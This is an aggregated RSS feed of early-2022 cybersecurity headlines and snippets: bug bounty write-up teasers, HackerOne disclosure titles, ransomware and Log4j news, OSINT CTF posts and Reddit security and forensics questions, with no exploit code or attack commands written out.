    CTF Continue reading on System Weakness »  ( 2 min )
    Hashing the Favicon.ico
    Hey Folks, I am Ski Mask and I recently started bug bounty. In this write-up, I will tell you about one of my findings!! Continue reading on Medium »  ( 1 min )
    Multi XSS Exploit in Upload File
    Hello amazing hunters, today I want to note 4 ways to find XSS in file upload, all of which I found in bug bounty programs or pentest… Continue reading on System Weakness »  ( 2 min )
    Cronos Theft of Transactions Fees Bugfix Postmortem
    Transactions in blockchain are like sound traveling through air. We communicate with others through transactions; we announce what we’re… Continue reading on Immunefi »  ( 4 min )
    Nakji Network launches a 200K USD Bug Bounty Program
    Singapore, 21st January 2022 — The Nakji Foundation (‘Nakji’) is launching a 200K USD Bug Bounty program for developers and security… Continue reading on Sentinel Protocol »  ( 3 min )
    Top 10 web hacking techniques of 2021 — PortSwigger
    OK, I will gradually translate all of the methods; you can see the original here: “‘Top 10 web hacking techniques of 2021 —… Continue reading on Medium »  ( 1 min )
  • Open

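    Thoughts on which commands are suitable for vulnerability detection
    We often need to send a request and observe the response, then judge from the response whether the command executed. So which kind of command gives the best result?  ( 1 min )
    FreeBuf Morning Briefing | Indonesia's central bank hit by ransomware attack, 13GB of data leaked; upheaval in Twitter's security team as former executives depart
    Peiter Zatko, head of Twitter's security department, has left the company; he was the well-known security hacker “Mudge”. Chief Information Security Officer Rinki Sethi will leave in the coming weeks.  ( 1 min )
    Cisco StarOS vulnerability may carry remote code execution and information disclosure risks
    Cisco recently announced that it has patched a remote code execution vulnerability.
    FreeBuf Enterprise Private Salon · Shanghai Finance Night event held successfully
    On the afternoon of January 15, the first “Enterprise Private Salon · Shanghai Finance Night” event, initiated by FreeBuf, China's cybersecurity industry portal, was held successfully in Shanghai.
    FreeBuf Weekly | Well-known subtitle site Opensubtitles hacked; China's first cybersecurity industry service short number launched
    We summarize and recommend this week's hot news, quality articles and handy tools, so that you do not miss any of this week's key points!  ( 1 min )
    ASRC 2021 email security trends in review
    In the post-pandemic era, everyone is gradually adapting to remote work; the deployment of information security equipment is no longer just a hurried response to the security risks that remote work brings, but an adaptive deployment of an entirely new kind  ( 1 min )
    2021 annual report on targeted ransomware attack activity
    Ransomware attacks are already one of the biggest threats to cybersecurity, having evolved from an early network nuisance into a new, escalating global challenge that endangers the functioning of society, economic stability and public safety.  ( 1 min )
    Case closed: the REvil ransomware group is caught
    On the 14th, Russian authorities announced arrests of the REvil ransomware group  ( 1 min )
    2021 cybersecurity regulations roundup: major regulations keep landing, data security meets new opportunities
    Overall, 2021 was the year the digital economy took off, the year cybersecurity developed comprehensively and in depth, and above all the year of comprehensive, in-depth regulation of the data field.  ( 1 min )
    Freebuf Enterprise Group Topic Discussion | Let's talk about enterprise cybersecurity during the holidays
    The Spring Festival is approaching, which is no small test for enterprise security. As the last topic discussion before the new year, we would like everyone to talk about how to safeguard enterprise network security during the holiday.  ( 1 min )
    2021 SCTF Flying-kernel challenge analysis
    This challenge can be solved by escalating privileges in several ways to obtain the flag. The solution in this article leans toward the Glibc style of exploitation, with a kernel arbitrary-address write; it is not the intended solution, but it yields further exploitation ideas, and interested readers can debug it themselves.  ( 3 min )
    FreeBuf Cybersecurity Chronicle | Summary of 2021 vulnerability exploitation incidents
    Let us look back and take stock of the 30 vulnerability exploitation incidents in 2021 that affected the industry and even society as a whole.  ( 1 min )
    “Information Security Technology: Guide to Measuring the Cost of Network Security Services” (draft for comment) released
    The Guide applies to activities carried out by both suppliers and buyers of network security services, such as cost budgeting for network security services, project bidding, final project accounting and drafting of related contracts.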
  • Open

    Lessons from the Log4j crisis: Are we ready for the next global vulnerability?
    Were you prepared for Log4Shell? These lessons learned will help your organization respond more efficiently to the next global vulnerability crisis. READ MORE  ( 3 min )
    What to know about Biden’s latest cybersecurity memorandum
    The Biden Administration’s new memorandum on National Security aims to improve security posture for intelligence and defense agencies. Here’s what you need to know. READ MORE  ( 2 min )
  • Open

    RedRabbit — Offensive PowerShell
    RedRabbit is the twin of BlueRabbit however, RedRabbit has more offensive scripts. RedRabbit was created to help conduct ethical… Continue reading on Medium »  ( 3 min )
  • Open

    A modern, elastic design for Burp Collaborator server
    When we launched Burp Collaborator back in 2015, PortSwigger deployed a public Collaborator server that anyone could use. This meant that OAST testing with Burp Collaborator was able to work straight  ( 4 min )
  • Open

    Security vulnerability in Rust standard library
    Article URL: https://blog.rust-lang.org/2022/01/20/cve-2022-21658.html Comments URL: https://news.ycombinator.com/item?id=30023615 Points: 64 # Comments: 37  ( 2 min )
    DNS Vulnerability, Configuration Errors That Can Cause DDoS
    Article URL: https://labs.ripe.net/author/giovane_moura/dns-vulnerability-configuration-errors-that-can-cause-ddos/ Comments URL: https://news.ycombinator.com/item?id=30021239 Points: 1 # Comments: 0  ( 7 min )
  • Open

    Tons of software to Try and Buy :-)
    https://soft.uclv.edu.cu/ submitted by /u/Appropriate-You-6065 [link] [comments]  ( 1 min )
  • Open

    Authz0 v1.1 Released 🎉
    Hi security engineers and hackers! Authz0 v1.1.0 has been released 🎉 First of all, I would like to thank many of you for your good feedback. Summary: Add setCred command; Add --include-zap flag in new command; Add --include-har flag in new command; Add --include-burp flag in new command; Add --assert-fail-size-margin flag in new command; Support multiple same assert type; Improve report; Fixed bugs. Credentials and setCred: Now, we can add credentials to the template using the setCred command.

  • Open

    Invalid handling of X509_verify_cert() internal errors in libssl (CVE-2021-4044)
    Internet Bug Bounty disclosed a bug submitted by tniessen: https://hackerone.com/reports/1455411 - Bounty: $1200
    Reflected XSS online-store-git.shopifycloud.com
    Shopify disclosed a bug submitted by bepresent: https://hackerone.com/reports/1410459 - Bounty: $3500
    Direct Access To admin Dashboard
    Shopify disclosed a bug submitted by mester_x: https://hackerone.com/reports/1421804 - Bounty: $500
    Stored XSS at https://linkpop.com
    Shopify disclosed a bug submitted by nagli: https://hackerone.com/reports/1441988 - Bounty: $1600
    Cross-site Scripting (XSS) - Stored on ads.tiktok.com in Text field
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1376961 - Bounty: $999
  • Open

    Does anyone know what "gaia_account_name" means specifically in the context of a Google Duo database table?
    I couldn't find much at all, but I feel like "gaia" has some connotation like mother/creator/origin, and thus "gaia_account_name" means the account name of the user that setup Google Duo on the device. Any progress toward certainty is greatly appreciated. submitted by /u/PieWithIceCreamCrust [link] [comments]  ( 1 min )
    I hosted a webinar for HTCIA last week about providing effective expert witness testimony - here’s the recording!
    submitted by /u/Monolith_Pro [link] [comments]  ( 1 min )
    Effective imaging/cloning large disk
    Hi there. Is there a most effective way of imaging very large disks (over 2 terabytes)? The next challenge is when doing the automated analysis (I'm using Autopsy), is there a more effective (fastest) way to do this? I once analyzed a 1 TB disk using Autopsy and it took more than 1 week to complete (the computer specification: CPU i7 6th Gen, RAM 32GB, imaging results on SSD, and using type C connector) EDIT 1: Thank you for all of your feedback. I can't afford a TX1 or any licensed tool (hardware or software based) at the moment. Using the open source tool is preferred. However, I am also open to any licensed hardware or software suggestions. The only licensed hardware that I use is the WiebeTech write blocker. I'm using Autopsy for automated analysis (some ingest modules were used such as hashing, web artifacts, keyword search, and Plaso) and CAINE for manual analysis. submitted by /u/modpr0be [link] [comments]  ( 3 min )
  • Open

    Log4j RCE When Remote Class File Won’t Load (Newer Java Versions)
    So you might have heard of the log4j vulnerability (lol). If you’ve read the initial proof of concepts/general information that rushed out… Continue reading on Medium »
    Collecting parameters with BURP SUITE!
    The reconnaissance phase is the most important one while we are analysing a “target”, and collecting parameters can change the course of your… Continue reading on Medium »  ( 2 min )
    Early bed bug stains on sheets
    Bedbugs are a real threat to your sleep quality. These small, oval, and brown animals at night eat our blood at night. If you wake up with… Continue reading on Medium »  ( 3 min )
    My First Blind XSS
    Disclaimer Continue reading on Medium »  ( 2 min )
    Facebook room deep linking vulnerability, allow malicious user to know the code for anyone’s…
    Title Facebook room deep linking vulnerability, allow malicious user to know the code for anyone’s meeting. Continue reading on Medium »  ( 2 min )
    Bug Bounty Methodology — Bug Hunting Checklist(PART-2)
    Hello people, it’s me again. I apologize for being late about the second part. I had some examinations going on and have been busy for the… Continue reading on Medium »  ( 2 min )
    XYZ of XSS
    Hello Ninjas! Today I am going to share everything(Almost Everything :P) that I know about Cross-site Scripting vulnerabilities. I would… Continue reading on Medium »  ( 4 min )
    PORTSWIGGER WEB SECURITY - AUTHENTICATION LAB SOLUTIONS
    Authentication, one of the most important parts of web applications, is the process of verifying the identity of a given user or client… Continue reading on Medium »  ( 17 min )
    How I Hacked into Pune University’s Exam/Teachers Portal
    Bypassing the Authentication mechanism results in an amazing Account takeover. Continue reading on Medium »  ( 4 min )
    Nakji Network’s 200K Bug Bounty Program
    The Nakji Foundation Continue reading on Medium »  ( 2 min )
  • Open

    Big Tech advertiser friendliness and SEO garbage.
    This is potentially a bit off-topic for this sub, but hopefully well within scope for the users: Feels like search results are full of complete nonsense (I've moved from google to qwant about a year ago, which was good at first, but now seems to be getting worse) and individual mainstream websites are constantly banning creators and removing content that's otherwise useful but potentially unfriendly to advertisers. This is just a loose feeling that the internet is getting worse every day, I'm wondering if there is any pushback against this and if it's possible to get an experience closer to 10-15 years ago when it didn't feel like a dystopian hellscape was rapidly approaching. Are corporate friendly walled gardens going to be the future of the internet? Is this going to be preferred when search engines lose the arms race against SEO spam? Is the sky actually falling? submitted by /u/TwinkyTheBear [link] [comments]  ( 1 min )
    Any love for Carbon Black EDR?
    CB Advanced is $30/device. SentinelOne Control is $31/device. CB gives me a process tree/timeline of the attack. S1 requires Complete to do that, about $60/device. I've been quoted $2,500 for VMware to help setup my policies so it's set and forget. I read a lot of hate on here about CB being too noisy. Also a decent amount of hate for S1. CrowdStrike seems to be the favorite but it's $70-80/device, so wanting CB or S1. Which one would you go with? 200 devices, so small environment. Upgrading from Webroot, so anything is better. submitted by /u/JeepMunkee [link] [comments]  ( 2 min )
    Which cloud IaS service for DDoS tests?
    Hello, we are a small pentesting firm and want to include (small-scale, short-term!) "DDoS" tests in our portfolio (only whitehat tests with full permission, simple stuff such as SYN floods, TLS flooding, slow loris). Our last cloud VPS vendor was ok with it first, but withdrew their permission to use their boxes for any kind of DDoS testing after a number of successful tests. Maybe it was just a nervous employee - but it is a problem for us if we cannot fulfill our obligations to our customers if the cloud vendor suddenly cuts our service. => We are thus looking for a reliable and trustworthy cloud IaS (VPS) provider for small scale DDoS tests: Up to a 100 virtual servers at a time (starting with 1, then adding servers until saturation is given or the target system passes the test without service reduction) API for instantiating/provisioning and starting/stopping the boxes, executing scripts Reasonable network connection - but volumetric DDoS testing is only the smallest part of our test suite Central to Eastern European area preferred Only whitehat tests with full permission, reputable business Only short bursts in the magnitude of minutes (until our monitor sensor recognizes service degradation in the target) Can you recommend cloud VPS vendors which are OK with such small-scale, short-term DDoS tests? Thank you very much! Dany submitted by /u/thrownetsecddos [link] [comments]  ( 1 min )
    What is this presumed phishing email trying to accomplish?
    The only thing I can think of is they are trying to get me to call the 888-number in the message. Simple Order is restaurant software, I don't work in a restaurant and they wouldn't have iPads. The address at the bottom in California is a house. There is no Durham in NY that I can find (the ship to). Paypal is clean. What am I missing? There are no links, no pictures or attachments I can find. I sanitized my name (which was correct) and my email address, everything else is from the original raw email. Please let me know if you need anything else to help figure out what's happening here. Thanks! ​ Received: from 10.217.151.75 by atlas212.free.mail.ne1.yahoo.com with HTTPS; Thu, 20 Jan 2022 15:49:18 +0000 Return-Path: X-Originating-Ip: [209.85.166.178] Rec…  ( 5 min )
    Help with Masters Thesis :) Python RAT Malware Samples
    Hey everyone, I am currently in the process of completing my dissertation which involves creating my own python malware to test some free anti-virus solutions and software. For the dissertation/thesis i need to find some samples of RAT malware written in python to analyse , I have managed to find a couple but ideally I need a good website/resource that has a database off them. Any help would be great , many thanks! submitted by /u/DJ0x [link] [comments]  ( 2 min )
    Home network abused for brute force ssh attacks
    Hi, an interesting security incident occurred at my home and I would greatly appreciate advice on how to proceed. Few days ago, my HBO service was blocked in all my devices connected to my home WiFi (yet worked outside the network), which was quite interesting and after few calls to HBO support I finally got the information that they actively blocked my IP address due to malicious activity occurring from my IP that was reported in public database. After some googling I found out that this must be the https://www.abuseipdb.com/ where my IP address really was reported (38x) for categories: "Port Scan", "Hacking", "Brute force", "SSH". I checked the reports in details and it seems that all attacks were done via SSH and they were trying to log into different websites using different user name…  ( 5 min )
    Where do you draw the line between legal and illegal?
    I've been a jr pentester for a few months and was wondering right before you get green light to pentest a web application and you have spare time at work and decide to gather some information, what is your approach? I can find some emails of the company and check with what tools the web app was built. But whenever I do subdomain scraping with amass or sublist3r or other frameworks the firewall is always signaling. I have absolutely no intention to do something illegal and get me or the company in trouble. Where do you draw the line which act is legal and illegal? I also want to get into bug bounty programs, but I am afraid because of the same reason. When doing do you use any proxies or other stuff? How do you basically stay safe (keep some anonymity) even for whitehat, when doing this job. submitted by /u/tryingtoworkatm [link] [comments]  ( 4 min )
    What's more lucrative: black hat or white hat hacking?
    submitted by /u/anon314159265358p [link] [comments]  ( 1 min )
  • Open

    Using Go to Develop Offensive Tooling
    With better Security Tooling, that can easily detect Powershell and C# Offensive Tooling, Red Teamers have to adapt their offensive capabilities. Go is a statically linked programming language which can be easily cross-compiled and needs no installation dependencies. This makes it perfect for Red Teamers. This great talk describes how Golang can be used in an offensive way: https://youtu.be/AGLunpPtOgM submitted by /u/_R4bb1t_ [link] [comments]  ( 1 min )
    MoonBounce: the dark side of UEFI firmware
    submitted by /u/dmchell [link] [comments]
  • Open

    Threat Brief: Ongoing Russia and Ukraine Cyber Conflict
    We analyze and suggest mitigations for CVE-2021-32648 and WhisperGate, two threats that have been targeting Ukrainian organizations. The post Threat Brief: Ongoing Russia and Ukraine Cyber Conflict appeared first on Unit42.
  • Open

    Exnoscan
    Exnoscan is a simple bash script that can help you identify gaps. We often monitor what we know, so Exnoscan aims to identify what you… Continue reading on Medium »  ( 2 min )
    Cyber Detective OSINT CTF “Evidence Investigation” Writeup
    The Cyber Society at Cardiff University runs Cyber Detective CTF, a free OSINT CTF. Continue reading on Medium »  ( 7 min )
    Doing OSINT with Google LENS
    Today I bring you a new article, where I decided to tackle one topic in particular, taking advantage of one of my greatest… Continue reading on Medium »  ( 4 min )
    GEOINT and SOCMINT in Investigation
    A few days ago I read an article by Mr. Diaz Caneja, where the author highlights very well the scope of social media intelligence and the… Continue reading on Medium »  ( 3 min )
    The new paradigms of investigation: CRIMINT and social media analytics in the face of digitalization
    To begin talking about these new paradigms, we must first understand these terms in order to make more enjoyable our… Continue reading on Medium »  ( 4 min )
    “YOU”, a series that shows us the vulnerability of our information on social networks
    Netflix released a new series that lets us see the importance of our data; in the story a young man becomes obsessed with a woman and… Continue reading on Medium »  ( 3 min )
    Quiztime — Random OSINT Challenge 4
    On Jan 7, 2022, Quiztime (contributor @fiete_stegers) shared a new OSINT quiz with us. The objective was, weird :). We had to figure out… Continue reading on Medium »  ( 1 min )
    Quiztime — Random OSINT Challenge 3
    On Jan 5, 2022, Quiztime (contributor @twone2) shared a new OSINT quiz with us. The objective was, weird :). We had to figure out what was… Continue reading on Medium »  ( 1 min )
    Quiztime — Random OSINT Challenge 2
    On Jan 1, 2022, a regular Quiztime and contributor @bayer_julia shared a new OSINT quiz with us. The objective was, simple. We had to… Continue reading on Medium »  ( 2 min )
    Quiztime — Random OSINT Challange 1
    On December 29, 2021, Quiztime (contributor @ twone2) shared a new OSINT quiz with us. The objective was, for me at least not very simple… Continue reading on Medium »  ( 2 min )
  • Open

    A Detailed Analysis of WhisperGate Targeting Ukrainian Organizations
    submitted by /u/CyberMasterV [link] [comments]
    Pentest Collaboration Framework: tool which will help you to store/modify/share information about pentest/web analysis projects. OpenSource, Portable, CrossPlatform & completely free! Supports integration with 15 tools & user-defined report generation. For several teams: separated workspaces!
    submitted by /u/Any_Gas_6250 [link] [comments]  ( 1 min )
    HOUDINI: A web app with huge number of Docker Images for Network Security with run commands and cheatsheet (Hundreds of Offensive and Useful Docker Images for Network Intrusion )
    submitted by /u/deleee [link] [comments]  ( 1 min )
    How mail server related DNS settings (SPF, DKIM, DMARC, MTA-STS, DANE, BIMI) work and their usage stats in the top 1M domain
    submitted by /u/c0r0n3r [link] [comments]  ( 1 min )
    First Morello prototype architecture silicon (memory safety at a hardware level)
    submitted by /u/unaligned_access [link] [comments]  ( 3 min )
    SMBSR made it through another lockdown with some new interesting skills (and fixes). Go check out and judge it (respectfully)
    submitted by /u/oldboy21 [link] [comments]  ( 1 min )
    OctopusWAF is an open-source web application firewall made in C language and uses libevent resources.
    submitted by /u/CoolerVoid [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-20 Review
    A brief analysis of modern enterprise network security architecture by ourren. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    WMI for Script Kiddies
    Introduction Let’s say an ‘Administrator’ lands on a target network host and wants to look around and ‘administer’ the system without uploading any new tools… How can I do that without burning any of my Script Kiddie tools? WMI or Windows Management Instrumentation or Windows Managed Infrastructure is an interface for managed components that provides... The post WMI for Script Kiddies appeared first on TrustedSec.  ( 12 min )
  • Open

    Hackable: 3 VulnHub Walkthrough
    Hackable: 3, Vulnhub medium machine was created by Elias Sousa and can be downloaded here. This lab is designed for experienced CTF players who want to The post Hackable: 3 VulnHub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Rust – Security advisory for the standard library (CVE-2022-21658)
    Article URL: https://blog.rust-lang.org/2022/01/20/cve-2022-21658.html Comments URL: https://news.ycombinator.com/item?id=30007470 Points: 10 # Comments: 0  ( 2 min )
  • Open

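    Attackers use adult games as bait, spreading malware via cloud storage
    Recently, security researchers found DDoS IRC Bot malware samples disguised as adult games and spread through cloud storage services.  ( 1 min )
    Attackers start using XLL files in attacks
    Recently, researchers have observed an increase in campaigns that use malicious Microsoft Excel add-in (XLL) files to launch attacks.  ( 1 min )
    Cybersecurity sandbox market to reach US$43 billion by 2027
    China's cybersecurity sandbox market is expected to reach US$6.9 billion by 2027.  ( 1 min )
    "Information Security Technology: Basic Requirements for the Competence of Cybersecurity Practitioners" (draft for comment) released
    The Basic Requirements specify the classification of cybersecurity practitioners and the knowledge and skills each category must have, and apply to organizations of all kinds in selecting, training, evaluating and managing cybersecurity practitioners.
    Marketing giant RRD admits data was stolen in Conti ransomware attack
    US marketing giant RR Donnelly (RRD) recently disclosed that data was stolen from the company in a cyberattack in December. BleepingComputer subsequently confirmed that it was a Conti ransomware attack. RRD is a leading integrated services company that provides communications, commercial printing and marketing services to enterprise customers. The company has more than 33,000 employees at over 200 locations worldwide, and its 2021 revenue was US$4.93 billion. On December 27, 2011, RRD, with the US Securities and Exchange Commission (SEC)
    Nine departments jointly issue "Several Opinions on Promoting the Regulated, Healthy and Sustainable Development of the Platform Economy"
    The Opinions set out nineteen measures covering improving rules and systems, raising regulatory capacity and standards, optimizing the development environment, strengthening capacity for innovative development, empowering economic transformation, and safeguard measures.
    International Committee of the Red Cross hit by cyberattack; data of more than 515,000 people leaked
    The International Committee of the Red Cross disclosed that its data contractor suffered a cyberattack, leading to a leak of information from the "Family Reunion" program, with the personal data of more than 515,000 people stolen.  ( 1 min )
    FreeBuf Morning Brief | US agents used WhatsApp to surveil Chinese phones; China's first cybersecurity industry service short number launched
    According to a government surveillance filing recently unsealed in Ohio, in November 2021 investigators from the US Drug Enforcement Administration asked WhatsApp to track 7 users located in China.  ( 1 min )
    CACTER Email Security & Zhongrui Tianxia (中睿天下) release Q4 2021 enterprise mailbox security report: take note, phishing emails doubled, 85% from overseas!
    CACTER Email Security and Zhongrui Tianxia jointly release an email security report! Phishing emails doubled year on year! 85% of them actually come from overseas? With the year-end approaching, stepping up defenses cannot wait  ( 1 min )
    Design and application of an IoT security platform based on the SM9 commercial cryptography algorithm
    How to solve IoT security has become a difficult problem facing government regulators and enterprises of all kinds. Rolling out a complete, scientific and standardized IoT security platform has therefore become an urgent task.  ( 1 min )
    What does a 90-point server room look like? (Part 1)
    Following on from the previous article "What does a 90-point server room look like? (Part 1)", this article continues with the other three areas of assessment criteria for server room equipment.  ( 1 min )
    任子行 (Surfilter) video network solution, focused on protecting video surveillance data!
    Netizens have reported that on Bilibili one can still find accounts that appear to specialize in cracking surveillance video from public places such as schools and hospitals and uploading it, and that through these accounts one can see multiple user-uploaded surveillance clips of teachers giving lessons, hospital nurses' stations and hotel front desks.
    Analyzing ROP construction with NX enabled
    When learning pwn, we often run into cases where NX is enabled, meaning the stack is non-executable; in that case we have to use content left uncleared on the stack, or functions such as init, to construct a ROP chain and go on to write an exp to get a shell.  ( 1 min )
    Marketing giant's data stolen, International Red Cross hit by cyberattack | Global cybersecurity highlights for January 20
    FBI warning: scammers are using fake QR codes to steal your passwords and money.  ( 1 min )
    Phishers are impersonating the US Department of Labor to steal users' Office 365 accounts
    The phishing campaign has been running for at least several months; the email senders pretend to be senior DoL employees and invite recipients to submit bids for ongoing government projects.
    FreeBuf cybersecurity chronicle | 2021 roundup of domestic cybersecurity incidents
    The domestic network environment has long been in dire straits; the trend of confrontation in cyberspace is increasingly evident, and the frequency of cyberattacks from other countries keeps increasing.  ( 1 min )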
  • Open

    Honeypot Discussions Part-3
    In this article, we will end the honeypot trilogy. If you haven’t read yet Part-1 and Part-2, you may take a look at them first. Or we can… Continue reading on Medium »  ( 7 min )
  • Open

    How Stack Overflow users responded to Log4Shell, the Log4j vulnerability
    Article URL: https://stackoverflow.blog/2022/01/19/heres-how-stack-overflow-users-responded-to-log4shell-the-log4j-vulnerability-affecting-almost-everyone/ Comments URL: https://news.ycombinator.com/item?id=30003308 Points: 2 # Comments: 0  ( 6 min )
  • Open

    wildlife photos
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]

  • Open

    Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike
    submitted by /u/dmchell [link] [comments]
    Kraken the Code on Prometheus
    submitted by /u/dmchell [link] [comments]
    PerSwaysion Threat Actor Updates Their Techniques and Infrastructure
    submitted by /u/dmchell [link] [comments]
    The OAuth Misconfiguration
    submitted by /u/banginpadr [link] [comments]
  • Open

    Xelu's FREE Controller Prompts | Visual prompts for every mainstream controller's inputs
    submitted by /u/PCubiles [link] [comments]  ( 1 min )
    A large folder of Charles Manson audio recordings
    http://109.120.203.163/Music/BLUES%20and%20country/Charles%20Manson/ Go upwards for more. If anyone finds any steel lap guitar resources, send them my way. I've decided to focus on music and living a simple life, something my life the last few years hasn't been. I changed countries, moved to the country and took a job in nursing. (until I convince my friend Andy to let me session/ tour with his band.) submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
    D&D stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Yet another SSRF query for Javascript
    GitHub Security Lab disclosed a bug submitted by npesaresi: https://hackerone.com/reports/1391724 - Bounty: $250
    Yet another SSRF query for Go
    GitHub Security Lab disclosed a bug submitted by npesaresi: https://hackerone.com/reports/1391725 - Bounty: $450
    Yet another SSRF query for Javascript
    GitHub Security Lab disclosed a bug submitted by luuliiromee: https://hackerone.com/reports/1391726 - Bounty: $250
    Yet another SSRF query for Javascript
    GitHub Security Lab disclosed a bug submitted by ciohianz: https://hackerone.com/reports/1391727 - Bounty: $250
    Yet another SSRF query for Javascript
    GitHub Security Lab disclosed a bug submitted by avada: https://hackerone.com/reports/1391728 - Bounty: $250
    Yet another SSRF query for Go
    GitHub Security Lab disclosed a bug submitted by luuliiromee: https://hackerone.com/reports/1391729 - Bounty: $450
    Yet another SSRF query for Go
    GitHub Security Lab disclosed a bug submitted by ciohianz: https://hackerone.com/reports/1391771 - Bounty: $450
    Yet another SSRF query for Go
    GitHub Security Lab disclosed a bug submitted by avada: https://hackerone.com/reports/1391772 - Bounty: $450
    [GO]: [CWE-090: LDAP Injection All For One]
    GitHub Security Lab disclosed a bug submitted by pupiles: https://hackerone.com/reports/1397942 - Bounty: $1800
    [Python]: CWE-079: HTTP Header injection
    GitHub Security Lab disclosed a bug submitted by jorgectf: https://hackerone.com/reports/1401159 - Bounty: $1800
    [Python]: JWT security-related queries
    GitHub Security Lab disclosed a bug submitted by jorgectf: https://hackerone.com/reports/1403263 - Bounty: $1800
    ihsinme: CPP Add query for CWE-675 Duplicate Operations on Resource
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1413540 - Bounty: $1000
    [porcupiney.hairs]: [Python] Add Flask Path injection sinks
    GitHub Security Lab disclosed a bug submitted by porcupineyhairs: https://hackerone.com/reports/1413541 - Bounty: $1800
    [Java] CWE-400: Query to detect uncontrolled thread resource consumption
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1413542 - Bounty: $1800
    Java: Regex injection
    GitHub Security Lab disclosed a bug submitted by edvraa: https://hackerone.com/reports/1443028 - Bounty: $1000
    [Javascript]: [Clipboard-based XSS]
    GitHub Security Lab disclosed a bug submitted by someonenobbd: https://hackerone.com/reports/1448236
    [Java] CWE-089: MyBatis Mapper XML SQL Injection
    GitHub Security Lab disclosed a bug submitted by jessforfun: https://hackerone.com/reports/1442954 - Bounty: $4500
    [Java] CWE-552: Query to detect unsafe request dispatcher usage
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1454582 - Bounty: $1800
    running a vulnerable log4j
    U.S. Dept Of Defense disclosed a bug submitted by alex_gaynor: https://hackerone.com/reports/1438393
    running a vulnerable log4j
    U.S. Dept Of Defense disclosed a bug submitted by alex_gaynor: https://hackerone.com/reports/1423496
    Reflected XSS on https:///via hidden parameter ""
    U.S. Dept Of Defense disclosed a bug submitted by supr4s: https://hackerone.com/reports/1029243
    Reflected XSS in https:// via hidden parameter ""
    U.S. Dept Of Defense disclosed a bug submitted by supr4s: https://hackerone.com/reports/1029238
    XSS Reflected -
    U.S. Dept Of Defense disclosed a bug submitted by drauschkolb: https://hackerone.com/reports/1223577
    Wrong settings in ADF Faces leads to information disclosure
    U.S. Dept Of Defense disclosed a bug submitted by h3xr: https://hackerone.com/reports/1422641
    User can pay using archived price by manipulating the request sent to `POST /v1/payment_pages/for_plink`
    Stripe disclosed a bug submitted by gregxsunday: https://hackerone.com/reports/1328278 - Bounty: $1000
    Dom Xss vulnerability
    Recorded Future disclosed a bug submitted by fornex: https://hackerone.com/reports/1448616
    Exposed Golang debugger on tier3.riot.mail.ru:9090, 9080
    Mail.ru disclosed a bug submitted by ian: https://hackerone.com/reports/1247910
  • Open

    Are you Looking for a team? Looking to collaborate with other hackers?
    We are looking for more members to join our team to collaborate on Projects, HackTheBox, CTF's & Bug Bounties. Our Members have found Vulnerabilities in the US Dept of Defense, Verizon Media, Yahoo & More on the HackerOne platform. We also have members that have been in the HTB Top 10 & 1st in the UK. You don't have to be the best, we are willing to help and teach members who may not be on our skill level, so please sign up if you're interested. We are trying to create a non-toxic environment in which hackers can collaborate without any drama. Please fill out our form and we will be in contact! Link to form: https://forms.gle/CDzVBLynAL9ftwK38 submitted by /u/Far-Piece-7371 [link] [comments]  ( 1 min )
  • Open

    PCAP Analysis
    Hi there. I am just starting to learn about PCAP analysis/forensics. I am experienced in Windows OS forensics and never really worked with PCAPs before. What's some of the tools everyone uses besides Wireshark? I've been reading up on Zeek. submitted by /u/antmar9041 [link] [comments]  ( 1 min )
    Tails Memory Forensics
    I was curious if anyone knows of any articles that cover this topic. A quick google search hasn’t borne anything useful. Preferably a professional paper submitted by /u/strollingginger [link] [comments]  ( 1 min )
    Degree decision
    Is CS or CE better for cyber forensics? submitted by /u/swatteam23 [link] [comments]  ( 2 min )
  • Open

    From MVP to ISO27001/SOC 2
    Hi Everyone, I just joined this community and would like to reach out with a question. I am a co-founder of an early-stage tech startup (saas) where we're about to reach our second product milestone soon - MVP. Our first commercial release ("Minimum Marketable Product") should happen around September 2022. We are about ten people, half of them developers. Everything is in the cloud. We have a Chief Architect who is a very mature professional. I don't have an IT background, but as we'd like to work with enterprises and other security-minded organizations, I am considering obtaining certification for standards like ISO27001 and/or SOC 2 (Type I and II). Is it a reasonable ambition to start this process as soon as our MVP is out (next month), or it's more realistic to wait until our product and team gains more maturity? If we have to pick, e.g. due to budget constraints, would you recommend to pursue ISO27001 or SOC 2? tl;dr: For a very young startup, what is the best time to start working on compliance and certifications? Thank you! submitted by /u/brunotoronto [link] [comments]  ( 3 min )
    Trend micro Apex One vs Deep Security/Cloud one
    Hi all, Is ApexOne good for Servers and Endpoints both? Or do we need to suggest Deep Security? If it is not good for Servers, why so? I know they are both the products of trend micro, but am not able to find understandable differences between both, need to know the difference between them for a project. Any kind of information or help on this would be nice, thank you. submitted by /u/aaronthecoolgnome [link] [comments]  ( 1 min )
    Hacking books(python) for intermediate programmers
    Some good python books for people who don't know anything about hacking but are intermediate programmers. I've read the book :- Starting out with Python, 5th Edition, ISBN : 9780135929032 submitted by /u/SufficientResident59 [link] [comments]
    Why do hackers like using reverse proxies?
    submitted by /u/baghdadcafe [link] [comments]  ( 1 min )
    Why do people put dots at the end of everything they send in work messages?
    Okay, I know this may not be the right Reddit sub for this question but I figured in IT most of us deal with teams or some sort of messaging. I know this also is kind of a weird thing to make a post about but it just is something I don't understand and genuinely want to. Whenever I message people at work or they message me they always leave dots at the end of a lot of the things they are saying. I have gotten dozens of messages saying "Hello...". It is not a typo either there is no way it could be. It reminds me of when someone texts you something and add it for dramatic effect but it will literally be messages like the one above saying hello or just "Sure...". It's just kind of odd to me but just was wondering if anyone knew why. Edit: Grammar & Thanks for the Informative Responses! submitted by /u/winningrove [link] [comments]  ( 4 min )
    Resources for Compensation
